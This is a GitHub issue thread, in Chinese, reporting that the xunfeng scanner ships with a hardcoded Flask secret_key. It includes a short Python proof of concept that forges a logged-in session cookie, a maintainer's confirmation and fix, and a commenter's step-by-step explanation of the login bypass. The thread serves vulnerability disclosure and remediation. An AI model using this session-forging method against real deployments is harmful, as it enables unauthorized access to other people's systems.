### ISSUE TITLE
硬编码secret_key导致可任意登录巡风

### ISSUE THREAD

**Issue by yeahx** [ysrc/xunfeng#91]
是这样的。。看你们文档还有Dockerfile部署的时候都没去修改app.secret_key，所以只要用下面的代码获取session，就可以随便登录绝大部分的巡风了。。。
```
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import Flask, session


app = Flask(__name__)
app.secret_key = "\xe8\xf7\xb9\xae\xfb\x87\xea4<5\xe7\x97D\xf4\x88)Q\xbd\xe1j'\x83\x13\xc7"

@app.route('/')
def index():
    session['login'] = 'loginsuccess'
    return 'aaa'


if __name__ == '__main__':
    app.run()
```

最好还是从environ获取或者直接urandom生成

**Comment by neargle** [comment]
感谢报告这个安全问题 确认问题存在 感谢提供PR修复这个安全问题
更新巡风到最新版本 并重启巡风web服务可修复该问题

**Comment by 0x5762** [comment]
初次查看该问题，一直没有明白这个问题的严重性，并且也不知道如何完成攻击。在这里简单的说一下，也给困惑的小伙伴解释下。
由于在flask默认情况下的session是本地的cookie，并不是像JSP那样存储在远程的session。只是使用了secret_key进行了加密。yeahx给出的这段代码的意思是自己部署一个flask的服务，请求根路径之后获取一个flask生成的session，把获取到的这个session在浏览器中写进巡风的路径下，然后请求/filter等需要验证的目录，就可以完成免密码登录了。这个攻击的原理类似于使用xss获取cookie一样。
默认session中的内容被.分成了三个部分，第一个部分是加密的数据，第二个是时间戳，第三个是校验值。第一部分可以使用base64进行解码还原出明文。
